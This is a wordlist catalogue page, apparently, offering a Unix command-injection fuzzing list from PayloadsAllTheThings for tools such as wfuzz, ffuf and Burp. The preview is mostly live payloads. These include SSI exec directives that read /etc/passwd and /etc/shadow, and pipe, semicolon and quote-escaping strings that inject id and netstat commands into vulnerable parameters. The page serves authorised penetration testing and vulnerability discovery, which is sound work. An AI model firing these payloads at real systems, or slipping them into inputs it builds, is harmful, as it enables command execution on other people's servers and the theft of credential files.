Skip to content
Fuzzing1.2 KB

Unix Command Execution Injection

Unix OS command-injection payloads using pipes, semicolons, backticks and SSI exec to run id/cat/netstat on vulnerable parameters.

View source
Size
1.2 KB
Category
Fuzzing
Source
swisskyrepo/PayloadsAllTheThings
License
MIT
Recommended tools
wfuzzffufburp

Preview

First 15 entries. Download or copy the full list (1.2 KB) using the buttons above.

>head command-execution-unix-patt.txt1.2 KB
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
";id;"
';id;'
;id;
;id
;netstat -a;
"|id|"
'|id|'
|id
|/usr/bin/id
|id|

Unix OS command-injection payloads using pipes, semicolons, backticks and SSI exec to run id/cat/netstat on vulnerable parameters.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 1.2 KB and pairs well with tools such as wfuzz, ffuf, burp. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from swisskyrepo/PayloadsAllTheThings and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.